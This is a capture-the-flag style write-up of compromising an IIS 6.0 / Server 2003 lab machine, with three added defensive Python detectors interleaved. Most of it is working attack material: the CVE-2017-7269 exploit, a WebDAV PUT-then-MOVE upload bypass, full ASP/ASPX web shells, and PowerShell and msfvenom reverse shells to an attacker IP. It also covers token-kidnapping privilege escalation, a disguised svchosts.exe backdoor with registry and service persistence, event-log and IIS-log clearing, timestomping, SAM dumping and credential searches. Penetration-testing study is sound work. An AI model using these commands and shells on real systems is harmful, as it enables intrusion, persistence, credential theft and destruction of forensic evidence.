Machine Synopsis
Key Exploitation Techniques:
- IIS 6.0 WebDAV stack buffer overflow in ScStoragePathFromUrl (CVE-2017-7269)
- WebDAV extension-filter bypass: PUT the script as .txt, then MOVE it to .asp
- Token kidnapping from NETWORK SERVICE to SYSTEM (MS09-012, Churrasco)
- Alternative kernel privilege escalation vectors (MS13-053, MS14-058)
Reconnaissance & Enumeration
Port Discovery
$ nmap -p- --min-rate 10000 10.10.10.15
PORT   STATE SERVICE
80/tcp open  http
Service Enumeration
$ nmap -p 80 -sC -sV 10.10.10.15
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Date: Mon, 07 Feb 2022 13:06:12 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
WebDAV Testing
# Test WebDAV functionality
$ davtest -url http://10.10.10.15
********************************************************
 Testing DAV connection
OPEN            SUCCEED:        http://10.10.10.15
********************************************************
NOTE    Random string for this session: JKlXQ8rn
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.10.15/DavTestDir_JKlXQ8rn
********************************************************
 Sending test files
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_JKlXQ8rn/davtest_JKlXQ8rn.txt
PUT     aspx    FAIL
PUT     asp     FAIL
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_JKlXQ8rn/davtest_JKlXQ8rn.html
The server accepts MKCOL and PUT of .txt/.html but refuses PUT of .asp/.aspx; since MOVE and COPY are also allowed, that filter can be sidestepped by renaming after upload (Method 2 below).
Exploitation
Method 1: CVE-2017-7269 Buffer Overflow
CVE-2017-7269 is a stack buffer overflow in ScStoragePathFromUrl() in the IIS 6.0 WebDAV component, reached through an overlong resource URL inside the If header of a PROPFIND request. Server 2003 was already out of support when the bug was published, so no vendor fix exists and disabling WebDAV is the only mitigation. The public exploit carries its payload as UTF-8 text inside that header, which is why the request below looks garbled.
# Using the automated Python exploit
$ git clone https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269.git
$ cd iis6-exploit-2017-CVE-2017-7269
# Setup netcat listener
$ nc -nlvp 1234
# Execute exploit: <target ip> <target port> <attacker ip> <attacker port>
$ python iis6_reverse_shell.py 10.10.10.15 80 10.10.14.3 1234
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橎牺䵈䑱呩咥嗈婰愈Ǖ壔浩㴰䀂簣堀慖圧樖尮nj潙暠̳㩮蕭䱹廌涪䝰煝䵈㤘汊浚楀焳ڝ穇敌ᄮ[...]> (Not <locktoken:write1>)
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.15] 1248
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
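IIS does not log request headers, so the oversized If header of this exploit is only visible on the wire (a tap, reverse proxy or WAF in front of the server). The following is an added example, not code from the write-up or from the exploit repository: it parses a raw PROPFIND request and reports the exploit's shape. The threshold and the two sample requests are constructed assumptions; the filler characters mimic the non-ASCII run in the request above.

```python
import re

# Assumption (not from the machine): a legitimate If header carries a few short
# tagged URIs or lock tokens, so a tagged URI longer than this, or one carrying
# non-ASCII bytes, has no benign explanation on an IIS 6 WebDAV endpoint.
MAX_TAGGED_URI = 128

TAGGED_RESOURCE = re.compile(rb"<([^>]*)>")


def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers); header names are lowercased bytes."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def cve_2017_7269_indicators(raw):
    """Return the reasons a request matches the exploit shape (empty list if it does not)."""
    method, _target, headers = parse_request(raw)
    if method != b"PROPFIND" or b"if" not in headers:
        return []
    reasons = []
    for uri in TAGGED_RESOURCE.findall(headers[b"if"]):
        # Lock tokens are the normal content of an If header; only tagged URLs matter.
        if uri.lower().startswith((b"locktoken:", b"opaquelocktoken:")):
            continue
        if len(uri) > MAX_TAGGED_URI:
            reasons.append("tagged URI of %d bytes" % len(uri))
        if any(b >= 0x80 for b in uri):
            reasons.append("non-ASCII bytes in tagged URI")
    return reasons


# Constructed samples: a request shaped like the exploit (payload replaced by
# repeated filler characters) and a benign PROPFIND carrying a lock token.
EXPLOIT_LIKE = (
    b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
    b"If: <http://localhost/aaaaaaa" + "\u6f68\u7863\u7761\u7133".encode("utf-8") * 40
    + b"> (Not <locktoken:write1>) <http://localhost/bbbbbbb"
    + "\u6f68\u7863".encode("utf-8") * 40 + b">\r\n\r\n"
)
BENIGN = (
    b"PROPFIND /public/ HTTP/1.1\r\nHost: localhost\r\nDepth: 1\r\n"
    b"If: (<opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>)\r\n\r\n"
)

if __name__ == "__main__":
    print("exploit-like:", cve_2017_7269_indicators(EXPLOIT_LIKE))
    print("benign:", cve_2017_7269_indicators(BENIGN))
```

Both tagged URLs in the constructed request trip both checks, so four reasons come back; the benign request and any non-PROPFIND request return nothing.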
Method 2: WebDAV File Upload Bypass
The PUT filter rejects .asp and .aspx by name, but the same check is not applied to the destination of a MOVE (or COPY), so the script is uploaded under a harmless extension and renamed in place.
# Create ASP reverse shell
$ cat > shell.asp << 'EOF'
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c " & Request.QueryString("cmd"))
o = cmd.StdOut.Readall()
Response.write(o)
%>
EOF
# Upload as .txt file then MOVE to .asp
# (-T uploads the file byte for byte; -d @file strips the newlines the VBScript needs)
$ curl -T shell.asp "http://10.10.10.15/shell.txt"
$ curl -X MOVE "http://10.10.10.15/shell.txt" -H "Destination: http://10.10.10.15/shell.asp"
# Test command execution
$ curl "http://10.10.10.15/shell.asp?cmd=whoami"
nt authority\network service
# Setup reverse shell
# (Server 2003 does not ship with PowerShell; if this returns nothing, upload a
# binary reverse shell such as the msfvenom shell.exe used below and run it instead)
$ nc -nlvp 1337
$ curl "http://10.10.10.15/shell.asp?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.10.14.3%27%2C1337%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22"
Initial Access Analysis
c:\windows\system32\inetsrv> systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
System Type: X86-based PC
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
# Q147222 is a well-known leftover entry rather than a security update: treat the host as unpatched.
c:\windows\system32\inetsrv> cd "C:\Documents and Settings"
C:\Documents and Settings> dir
Access is denied.
# NETWORK SERVICE has no rights on the user profiles, so both flags need privilege escalation.
Privilege Escalation
MS09-012 (Churrasco) Exploitation
MS09-012 is the "token kidnapping" issue: on Server 2003 the IIS worker process runs as NETWORK SERVICE with SeImpersonatePrivilege, and the RPCSS service, which runs under the same account, holds threads impersonating SYSTEM. Churrasco opens RPCSS, steals one of those SYSTEM tokens and launches the supplied command with it, so no kernel exploit is involved.
# Download Churrasco exploit
$ wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
# Setup SMB server for file transfer (Server 2003 only speaks SMB1; -smb2support is harmless)
$ impacket-smbserver kali . -smb2support
# Create writable directory and transfer exploit
c:\windows\system32\inetsrv> cd C:\
C:\> mkdir temp
C:\> cd temp
C:\temp> copy \\10.10.14.3\KALI\churrasco.exe .
        1 file(s) copied.
# Test exploit functionality
C:\temp> churrasco.exe "whoami"
nt authority\system
# Create reverse shell payload
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1337 -f exe -o shell.exe
# Transfer shell payload
C:\temp> copy \\10.10.14.3\KALI\shell.exe .
        1 file(s) copied.
# Setup listener and execute privilege escalation
$ nc -nlvp 1337
C:\temp> churrasco.exe "C:\temp\shell.exe"
SYSTEM Access
$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.15] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP> whoami
nt authority\system
C:\WINDOWS\TEMP> cd "C:\Documents and Settings\Lakis\Desktop"
C:\Documents and Settings\Lakis\Desktop> type user.txt
700c5dc163014e22b3e408f8703f67d1
C:\Documents and Settings\Lakis\Desktop> cd "C:\Documents and Settings\Administrator\Desktop"
C:\Documents and Settings\Administrator\Desktop> type root.txt
aa4beed1c0584445ab463a6747bd06e9
Post-Exploitation Techniques
Persistence Methods
Registry Persistence
# Create backdoor payload
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe -o backdoor.exe
# Transfer via SMB
$ impacket-smbserver share . -smb2support
# Install backdoor under a look-alike name. Never overwrite the real svchost.exe:
# Windows File Protection restores it and the host can become unstable in the meantime.
C:\WINDOWS\TEMP> copy \\10.10.14.3\share\backdoor.exe C:\WINDOWS\system32\svchosts.exe
# Add registry persistence
C:\WINDOWS\TEMP> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdate" /t REG_SZ /d "C:\WINDOWS\system32\svchosts.exe"
# Verify persistence
C:\WINDOWS\TEMP> reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Service Installation
# Create persistent service
# The SCM expects a service binary: a plain msfvenom exe is killed after about 30 s
# with error 1053, so build the service payload with -f exe-service instead of -f exe.
C:\WINDOWS\TEMP> sc create "SystemUpdate" binpath= "C:\WINDOWS\system32\svchosts.exe" start= auto
[SC] CreateService SUCCESS
C:\WINDOWS\TEMP> sc start "SystemUpdate"
[SC] StartService SUCCESS
# Setup handler for backdoor connections
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.3
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
Web Shell Persistence
# Install persistent web shell
C:\WINDOWS\TEMP> copy \\10.10.14.3\share\shell.asp "C:\Inetpub\wwwroot\search.asp"
# Hide file (hidden/system attributes only affect a plain dir listing; dir /a and IIS still see it)
C:\WINDOWS\TEMP> attrib +h +s "C:\Inetpub\wwwroot\search.asp"
# Access via: http://10.10.10.15/search.asp?cmd=whoami
Defense Evasion
Log Cleanup
# Clear Windows Event Logs
# The .evt files under system32\config are held open by the Event Log service, so
# overwriting them fails; wevtutil does not exist on Server 2003, but WMI can clear them.
# Note that clearing the Security log itself writes event 517 ("audit log was cleared").
C:\WINDOWS\TEMP> wmic nteventlog where "LogfileName='Security'" call ClearEventLog
C:\WINDOWS\TEMP> wmic nteventlog where "LogfileName='System'" call ClearEventLog
C:\WINDOWS\TEMP> wmic nteventlog where "LogfileName='Application'" call ClearEventLog
# Clear IIS logs (the current day's ex*.log is held open by HTTP.sys and cannot be deleted;
# a missing range of log files is itself an indicator for whoever reviews them)
C:\WINDOWS\TEMP> del "C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"
# Clear HTTP.sys error logs
C:\WINDOWS\TEMP> del "C:\WINDOWS\system32\LogFiles\HTTPERR\*.log"
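The W3SVC1 log deleted above is exactly where the upload chain from Method 2 is recorded, which is the argument for shipping IIS logs off the host. The following is an added example, not part of the write-up: it parses IIS 6 W3C extended log lines and flags the two indicators that survive in them. The MOVE Destination header is not logged, so the rename target is invisible; the indicator is a successful PUT followed by a MOVE of the same stem from the same client, plus any request for a script with a cmd= query. The log excerpt is constructed to mirror the write-up's requests, and the time window is an assumption.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS 6 W3C extended log excerpt (not taken from the machine): the
# PUT/MOVE/GET chain as IIS would record it, plus a benign WebDAV client from
# another address. IIS replaces spaces inside a field with '+'.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2022-02-07 13:05:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2022-02-07 13:05:01 10.10.10.15 GET / - 80 - 10.10.14.3 Mozilla/5.0+(X11;+Linux) 200 0 0
2022-02-07 13:06:12 10.10.10.15 PUT /shell.txt - 80 - 10.10.14.3 curl/7.81.0 201 0 0
2022-02-07 13:06:14 10.10.10.15 MOVE /shell.txt - 80 - 10.10.14.3 curl/7.81.0 201 0 0
2022-02-07 13:06:20 10.10.10.15 GET /shell.asp cmd=whoami 80 - 10.10.14.3 curl/7.81.0 200 0 0
2022-02-07 13:06:30 10.10.10.15 PROPFIND /shared/ - 80 - 10.10.14.5 Microsoft-WebDAV-MiniRedir/5.1.2600 207 0 0
2022-02-07 13:06:31 10.10.10.15 GET /shared/report.txt - 80 - 10.10.14.5 Microsoft-WebDAV-MiniRedir/5.1.2600 200 0 0
"""

SCRIPT_EXTENSIONS = (".asp", ".aspx")
WINDOW = timedelta(minutes=10)  # assumption: how long a PUT may precede its MOVE


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the names on the #Fields line."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split(" ")
            if len(parts) == len(fields):
                row = dict(zip(fields, parts))
                row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
                rows.append(row)
    return rows


def detect_webdav_abuse(rows):
    """Return (client, indicator, detail) tuples for the upload-rename and web-shell patterns."""
    findings = []
    by_client = defaultdict(list)
    for row in rows:
        by_client[row["c-ip"]].append(row)
    for client, reqs in by_client.items():
        reqs.sort(key=lambda r: r["ts"])
        for i, put in enumerate(reqs):
            if put["cs-method"] != "PUT" or not put["sc-status"].startswith("2"):
                continue
            # Destination is not logged: pair the PUT with a later MOVE of the same stem.
            for move in reqs[i + 1:]:
                if (move["cs-method"] == "MOVE" and move["cs-uri-stem"] == put["cs-uri-stem"]
                        and move["ts"] - put["ts"] <= WINDOW):
                    findings.append((client, "put_then_move", put["cs-uri-stem"]))
        for req in reqs:
            if (req["cs-uri-stem"].lower().endswith(SCRIPT_EXTENSIONS)
                    and "cmd=" in req["cs-uri-query"].lower()):
                findings.append((client, "webshell_query", req["cs-uri-stem"] + "?" + req["cs-uri-query"]))
    return findings


if __name__ == "__main__":
    for finding in detect_webdav_abuse(parse_w3c(SAMPLE_LOG)):
        print(finding)
```

Run against the excerpt it reports two findings for 10.10.14.3 and nothing for the MiniRedir client; in practice the same two rules also catch COPY used in place of MOVE if "COPY" is added to the method check.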
File Attribute Manipulation
# Hide backdoor files
C:\WINDOWS\TEMP> attrib +h +s +r C:\WINDOWS\system32\svchosts.exe
# Timestamp manipulation: copy /y creates a file with the current time and would
# overwrite the backdoor with cmd.exe. Server 2003 has no built-in tool for this; from
# the meterpreter session, timestomp copies the MACE times of cmd.exe onto the backdoor.
meterpreter > timestomp C:\\WINDOWS\\system32\\svchosts.exe -f C:\\WINDOWS\\system32\\cmd.exe
Lateral Movement Preparation
Network Discovery
# Discover network hosts
C:\WINDOWS\TEMP> for /L %i in (1,1,254) do @ping -n 1 -w 200 10.10.10.%i | findstr "Reply"
# Check for shared resources (<password> is a placeholder for harvested credentials)
C:\WINDOWS\TEMP> net view \\10.10.10.1
C:\WINDOWS\TEMP> net use \\10.10.10.1\c$ /user:administrator <password>
Credential Harvesting
# Dump SAM database (needs SYSTEM; parse offline with
# impacket-secretsdump -sam sam.hiv -system system.hiv LOCAL)
C:\WINDOWS\TEMP> reg save HKLM\SAM C:\WINDOWS\Temp\sam.hiv
C:\WINDOWS\TEMP> reg save HKLM\SYSTEM C:\WINDOWS\Temp\system.hiv
# Search for stored passwords
C:\WINDOWS\TEMP> findstr /si password C:\*.txt C:\*.ini C:\*.cfg
C:\WINDOWS\TEMP> dir /s /b C:\ | findstr /i password
Domain Enumeration
# Check domain information (only meaningful on a domain-joined host; on a workgroup
# server %USERDOMAIN% is just the hostname and the /domain queries fail)
C:\WINDOWS\TEMP> echo %USERDOMAIN%
C:\WINDOWS\TEMP> net user /domain
C:\WINDOWS\TEMP> net group "Domain Admins" /domain
Alternative Exploitation Methods
WebDAV with curl
# Manual WebDAV file upload
$ curl -X PUT "http://10.10.10.15/test.txt" -d "test content"
$ curl -X MOVE "http://10.10.10.15/test.txt" -H "Destination: http://10.10.10.15/test.asp"
# Upload ASPX shell (IIS 6 returns 404 for .aspx unless ASP.NET is set to Allowed under
# Web Service Extensions, so the classic ASP shell above is the safer first choice)
$ cat > shell.aspx << 'EOF'
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
// Both methods must be class-level, not nested inside Page_Load: local functions are
// not understood by the ASP.NET compilers on Server 2003, and OnClick can only bind
// to a page-level method.
string ExecuteCmd(string arg)
{
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = "cmd.exe";
    psi.Arguments = "/c " + arg;
    psi.RedirectStandardOutput = true;
    psi.UseShellExecute = false;
    Process p = Process.Start(psi);
    StreamReader stmrdr = p.StandardOutput;
    string s = stmrdr.ReadToEnd();
    stmrdr.Close();
    return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
    Response.Write("<pre>");
    Response.Write(Server.HtmlEncode(ExecuteCmd(txtArg.Text)));
    Response.Write("</pre>");
}
</script>
<HTML>
<body>
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" runat="server" Text="execute" OnClick="cmdExe_Click"></asp:Button>
</form>
</body>
</HTML>
EOF
$ curl -T shell.aspx "http://10.10.10.15/shell.txt"
$ curl -X MOVE "http://10.10.10.15/shell.txt" -H "Destination: http://10.10.10.15/shell.aspx"
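Method 2 and the curl variant just above rely on the same server-side mistake: the extension filter is evaluated when a name is created by PUT but not when a name is created by MOVE. The following is an added example, not code from the write-up or from IIS: a minimal in-process WebDAV-like server that reproduces that behaviour next to a hardened variant which applies the filter to the MOVE destination as well, and a client that replays the PUT-as-.txt-then-MOVE-to-.asp sequence against both. Server, paths and the embedded ASP one-liner are constructed for illustration.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

BLOCKED = (".asp", ".aspx")  # what the target's PUT filter rejected in davtest


def make_handler(storage, filter_move_destination):
    """Handler factory: `storage` is the fake web root, a dict mapping path -> bytes."""

    class DavHandler(BaseHTTPRequestHandler):
        def log_message(self, *args):
            pass  # silence per-request console output

        def _reply(self, code):
            self.send_response(code)
            self.send_header("Content-Length", "0")
            self.end_headers()

        def do_PUT(self):
            # The filter is applied here, on the name PUT would create ...
            if self.path.lower().endswith(BLOCKED):
                return self._reply(403)
            storage[self.path] = self.rfile.read(int(self.headers.get("Content-Length", 0)))
            self._reply(201)

        def do_MOVE(self):
            dest = urlsplit(self.headers.get("Destination", "")).path
            if self.path not in storage:
                return self._reply(404)
            # ... but MOVE creates a name too. The vulnerable server skips the check
            # here; the hardened one applies the same filter to the destination.
            if filter_move_destination and dest.lower().endswith(BLOCKED):
                return self._reply(403)
            storage[dest] = storage.pop(self.path)
            self._reply(201)

    return DavHandler


def _request(port, method, path, body=None, headers=None):
    """One request on a fresh connection (the server speaks HTTP/1.0 and closes after each)."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request(method, path, body=body, headers=headers or {})
    status = conn.getresponse().status
    conn.close()
    return status


def run_bypass(filter_move_destination):
    """Replay PUT /shell.asp (refused), PUT /shell.txt, MOVE -> /shell.asp; return the statuses."""
    storage = {}
    server = HTTPServer(("127.0.0.1", 0), make_handler(storage, filter_move_destination))
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    # Constructed stand-in for the ASP web shell; the server never executes it.
    shell = b'<% Response.Write(CreateObject("WScript.Shell").Exec("cmd /c " & Request.QueryString("cmd")).StdOut.ReadAll()) %>'
    try:
        result = {
            "put_asp": _request(port, "PUT", "/shell.asp", shell),
            "put_txt": _request(port, "PUT", "/shell.txt", shell),
            "move": _request(port, "MOVE", "/shell.txt",
                             headers={"Destination": "http://127.0.0.1:%d/shell.asp" % port}),
        }
    finally:
        server.shutdown()
        server.server_close()
    result["asp_exists"] = "/shell.asp" in storage
    return result


if __name__ == "__main__":
    print("PUT-only filter:   ", run_bypass(filter_move_destination=False))
    print("PUT+MOVE filter:   ", run_bypass(filter_move_destination=True))
```

Against the PUT-only filter the direct PUT of shell.asp gets 403, the .txt upload and the MOVE both succeed and shell.asp ends up in the web root; with the filter also applied to the MOVE destination, the MOVE is refused and no script file exists. The same check would need to cover COPY, which IIS 6 also allowed here.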
Alternative Privilege Escalation
Kernel Exploits (Churrasco Alternatives)
# If Churrasco fails, the unpatched Server 2003 SP2 kernel is also exposed to win32k.sys
# bugs. ppr_flatten_rec.exe (MS13-053, EPATHOBJ::pprFlattenRec) spawns a SYSTEM shell
# when it succeeds; ms14-058.exe (CVE-2014-4113) is run with the payload to execute as
# its argument. Unlike token kidnapping these are kernel exploits, so a failed attempt
# can crash the host.
C:\temp> copy \\10.10.14.3\share\ppr_flatten_rec.exe .
C:\temp> ppr_flatten_rec.exe
# MS14-058 if available
C:\temp> copy \\10.10.14.3\share\ms14-058.exe .
C:\temp> ms14-058.exe "C:\temp\shell.exe"